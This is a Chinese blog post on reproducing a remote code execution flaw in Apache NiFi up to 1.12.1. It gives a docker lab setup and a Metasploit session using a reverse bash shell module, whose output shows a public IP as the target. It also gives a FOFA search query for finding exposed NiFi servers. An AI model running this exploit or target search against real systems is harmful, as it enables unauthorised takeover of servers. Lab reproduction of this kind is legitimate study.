Apache NiFi远程代码执行-RCE

最新推荐文章于 2024-01-31 11:40:32 发布
最新推荐文章于 2024-01-31 11:40:32 发布
阅读量5.4k 收藏 5
点赞数 2
分类专栏: 漏洞复现 文章标签: Apache NiFi
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44159028/article/details/114636047
版权

目录

一. 漏洞简介

二. 影响版本

三. docker-compose进行漏洞环境搭建

四. 漏洞复现

五. 漏洞挖掘

六. 漏洞修复

一. 漏洞简介

       Apache NiFi 是一个易于使用、功能强大而且可靠的数据处理和分发系统。Apache NiFi 是为数据流设计。它支持高度可配置的指示图的数据路由、转换和系统中介逻辑。

二. 影响版本

Apache NiFi  <= 1.12.1

三. docker-compose进行漏洞环境搭建

测试环境版本:nifi:1.12.0

docker-compose.yml文件内容如下

version: '2'
services:
 struts2:
   image: apache/nifi:1.12.0
   ports:
    - "8080:8080"
    - "8000:8000"
    - "10000:10000"

执行docker-compose up -d 启动环境

访问8080,如下环境搭建成功

 

四. 漏洞复现

1. 用大神的脚本 https://github.com/freeFV/CVE-2020/blob/main/Apache%20NiFi%20Api%20%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C(RCE).md

我这里是复现不了

2. 使用msf进行攻击

msf6 > use exploit/multi/http/apache_nifi_processor_rce
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(multi/http/apache_nifi_processor_rce) > set lhost 192.168.60.7
lhost => 0.0.0.0
msf6 exploit(multi/http/apache_nifi_processor_rce) > set lport 4444
lport => 4444
msf6 exploit(multi/http/apache_nifi_processor_rce) > set rhosts 目标ip
rhosts => 74.208.80.242
msf6 exploit(multi/http/apache_nifi_processor_rce) > set rport 目标端口
rport => 9090
msf6 exploit(multi/http/apache_nifi_processor_rce) > run

执行run,开始攻击,获取shell。

五. 漏洞挖掘

fofa:"nifi" && title=="NiFi"

六. 漏洞修复

升级到最新版

 

 

~Echo
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
二进制扫描的缓冲区溢出漏洞探测技术
09-08
缓冲区溢出漏洞自从出现以来,一直引起许多严重的安全性问题,而且随着软件系统越做越大,越来越复杂,缓冲区溢出漏洞的出现越来越普遍。本文从检测程序的漏洞方面着手,比较了以前常用的静态代码分析和实时错误注入的检测方法,提出了一种对可执行文件反汇编后的代码进行缓冲区溢出漏洞检测的技术, 提高了检测软件系统漏洞的效率。
Log4j远程代码执行漏洞环境搭建及复现
最新发布
m0_71263989的博客
02-20 999
Log4j2 是一个用于 Java 应用程序的成熟且功能强大的日志记录框架。它是 Log4j 的升级版本,相比于 Log4j,Log4j2 在性能、可靠性和灵活性方面都有显著的改进。
【高危】Apache NiFi 远程资源检索功能存在命令注入漏洞
murphysec的博客
08-04 240
Apache NiFi 1.23.0之前版本中包含使用 HTTP URL 进行远程资源检索的 Processors 和 Controller Services,但是未限制普通身份用户配置此功能。经过身份验证的攻击者可配置恶意的外部资源引用地址,当组件加载攻击者可控的恶意配置文件或附加库时触发远程代码执行。OSCS是国内首个开源软件供应链安全社区,社区联合开发者帮助全球顶级开源项目解决安全问题,并提供实时的安全漏洞情报,同时提供专业的代码安全检测工具为开发者免费使用。
2020-10-24Apache Flink未授权访问-远程代码命令执行-复现
thelostworld
10-24 936
​好久没更新了,今天趁1024更新一篇,最近工作中遇到这个漏洞,今天自己来做一下这个漏洞复现。 Apache Flink未授权访问-远程代码命令执行-复现 一、漏洞简介 Apache Flink Dashboard默认没有用户权限认证。攻击者可以通过未授权的Flink Dashboard控制台,直接上传木马jar包,可远程执行任意系统命令获取服务器权限,风险极大。 二、影响版本 Apache Flink <= 1.9.1(最新版本) 三、漏洞复现 1、生成反弹jar包 msfv..
Apache NiFi API远程代码执行复现
锋刃科技的博客
12-07 2602
简介 一个易用、强大、可靠的数据处理与分发系统。基于Web图形界面,通过拖拽、连接、配置完成基于流程的编程,实现数据采集等功能 环境搭建 进入目录 cd nifi-1.12.1/bin/ ./nifi.sh 先执行一下试试,可以看到启动、停止、执行、重启、状态、dump、诊断、安装(为系统服务)、无状态 ./nifi.sh start 执行启动命令,删除了“java home”和“nifi home”,启动配置文件为“conf/bootstrap...
【推荐】网络安全中的漏洞挖掘实践合集.zip
09-03
推荐,网络安全中的漏洞挖掘实践合集,仅供大家学习参阅,包含内容如下: 针对现实应用的文本对抗攻击研究 安全众测下的漏洞发展新趋势 安卓应用漏洞挖掘 从0到1-发现与拓展攻击面 对基于Git的版本控制服务的通用攻击面的探索 对民用飞行控制系统固件的逆向与漏洞分析 卫星通信的安全缺陷 基于全流量的智慧漏洞挖掘 基于运行时类型嗅探技术提高模糊测试的漏洞发掘效果 漏洞挖掘进化论-推开xray之门 逆向在漏洞挖掘中的应用 苹果攻击面和漏洞挖掘自动化研究 如何从高赏金项目中拿到高危 如何去挖掘物联网环境中的高级恶意软件威胁 如何在3个月发现 12 个内核信息泄露漏洞 沙箱内持久化.行之有效的沙箱攻击新思路 深度解析Weblogic_XMLDecoder反序列化 使用数据流敏感模糊测试发现漏洞 锁不住的安全 谈谈工业协议转换器的一些问题 逃逸IE浏览器沙箱-在野0Day漏洞利用复现 为何自动化漏洞挖掘如此困难 现代可抵赖后门研究 一扇虚掩的大门-现代智能系统的重要攻击面 源代码漏洞挖掘 远程root现代安卓设备 在现代Windows内核中发现存在20年的漏洞 针对智能设备漏洞挖掘的一些新方法 AI用于软件漏洞挖掘 AndroidWebView安全攻防指南2020 Java反序列化漏洞自动挖掘方法 macOS从运行库劫持到内核提权 MTK安全启动大剖析.CIS大会分论 MyBatis框架下SQL注入解决方案 Qemu-kvm和ESXi虚拟机逃逸实例分享 WEB常见漏洞与挖掘技巧研究 Web漏洞挖掘速成特训营 混合式漏洞挖掘研究进展
Apache NiFi API RCE 复现
weixin_51345872的博客
09-01 2436
仅供学习参考使用,任何违法事情与本人无关。
【高危】Apache NiFi H2驱动存在代码注入漏洞
murphysec的博客
06-19 294
Apache NiFi 是一个开源的数据流处理和自动化工具,DBCPConnectionPool 和 HikariCPConnectionPool 是两个控制器服务,用于提供对数据库的连接池管理功能。Apache NiFi 受影响版本,由于 DBCPConnectionPool 和 HikariCPConnectionPool 控制器服务未对用户配置的 H2 驱动程序的 URL 字符串进行验证,经过身份验证的攻击者可构造包含恶意负载的 H2 JDBC URL,在目标服务器上执行恶意代码
APACHE OFBIZ XML-RPC 反序列化漏洞 (CVE-2020-9496) 的复现与分析
smellycat000的专栏
12-23 1270
聚焦源代码安全,网罗国内外最新资讯!1.1 状态完成漏洞挖掘条件分析、漏洞复现。1.2 简介相关的重点类和方法:org.apache.xmlrpc.parser.Serializabl...
一种基于模糊测试的车载ECU漏洞挖掘方法
03-14
一种基于模糊测试的车载ECU漏洞挖掘方法,李涛,徐国爱,随着车联网的飞速发展和一种基于模糊测试的车载ECU漏洞挖掘方法汽车智能化的不断提高,通过CAN总线连接的车载ECU作为车辆核心控制节
9、NIFI综合应用场景-通过NIFI配置kafka的数据同步
05-29
9、NIFI综合应用场景-通过NIFI配置kafka的数据同步 网址:https://blog.csdn.net/chenwewi520feng/article/details/130622776 本文旨在介绍nifi与kafka的交互过程,即生产数据到kafka中,然后通过nifi消费kafka中的...
8、NIFI综合应用场景-NiFi监控MySQL binlog进行实时同步到hive
05-29
8、NIFI综合应用场景-NiFi监控MySQL binlog进行实时同步到hive 网址:https://blog.csdn.net/chenwewi520feng/article/details/130620988 本文旨在介绍通过实时监控mysql的binlog实现数据的实时同步至hive中。但由于...
7、NIFI综合应用场景-将mysql查询出的json数据转换成txt后存储至HDFS中
05-29
7、NIFI综合应用场景-将mysql查询出的json数据转换成txt后存储至HDFS中 网址:https://blog.csdn.net/chenwewi520feng/article/details/130620392 本文是在6、NIFI综合应用场景-离线同步Mysql数据到HDFS中基础上完成...
nifi-maven:Apache NiFi NAR Maven插件
02-04
目录要求JDK 1.8或更高Apache Maven 3.1.0或更高版本入门构建nifi-nar-maven-plugin模块应该很少,因为与主要的“ nifi代码树相比,它很少发布。 使用mvn clean install构建假设您需要使用对nifi-nar-maven-plugin...
nifi-1.14.0-bin.zip
03-18
Apache NiFi supports powerful and scalable directed graphs of data routing, transformation, and system mediation logic. Some of the high-level capabilities and objectives of Apache NiFi include:
Apache NiFi远程代码执行(CVE-2023-34468)
m0_65150886的博客
01-31 223
Apache NiFi
学习笔记-B/S - Exploits
人饭子的博客
11-02 9951
B/S - Exploits 免责声明 本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关. 大纲 各类论坛/CMS框架 AEM 74CMS dedeCMS Discuz Discuz Discuz!ML Drupal ECshop Fastadmin Laravel jeecg jeewms Joomla Maccms MetIn...
Apache两个解析漏洞复现及防御方法
m0_71745258的博客
01-12 505
配置apache时,对于apache配置不熟练,配置命令不清楚,在配置PHP文件处理程序时,配置命令存在问题:位于漏洞环境目录的conf/docker-php.conf里的配置命令(AddHandler application/x-httpd-php.php),该命令会将后缀中只要含有.php的文件都会被处理程序解析,这导致攻击者可通过多后缀绕过文件上传限制以.php结尾的机制,并使之被处理程序执行。在漏洞环境目录处运行容器浏览器访问你的ip地址,可以看到一个文件上传网页。
Problems Parentorg.apache.nifi:c2-client-bundle:1.22.0' has problems java.lang.OutOfMemoryError: Java heap space
07-10
出现"java.lang.OutOfMemoryError: Java heap space"错误通常表示Java堆空间不足。这意味着您的应用程序需要更多的内存来执行所需的操作。解决此问题的几种方法包括: 1. 增加Java堆空间:您可以通过在启动应用程序时使用"-Xmx"和"-Xms"参数来增加Java堆空间。例如,您可以使用"-Xmx2g"将最大堆大小设置为2GB。请注意,这取决于您的系统和可用内存。 2. 优化代码和内存使用:检查代码中是否有内存泄漏或不必要的对象保留在内存中。确保及时释放不再使用的对象,并使用合适的数据结构和算法来减少内存占用。 3. 调整应用程序需求:如果您的应用程序处理大量数据或执行复杂计算,考虑优化算法或分批处理数据,以减少内存使用。 4. 使用更高效的数据处理框架:如果您正在处理大型数据集,请考虑使用分布式处理框架如Apache Spark或Apache Flink,它们可以有效地管理内存和处理大规模数据。 请注意,具体解决方案可能因您的应用程序和环境而异。建议您根据具体情况尝试上述方法,并根据需要进行调整。如果问题仍然存在,请提供更多详细信息,我将尽力帮助您解决问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

~Echo

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值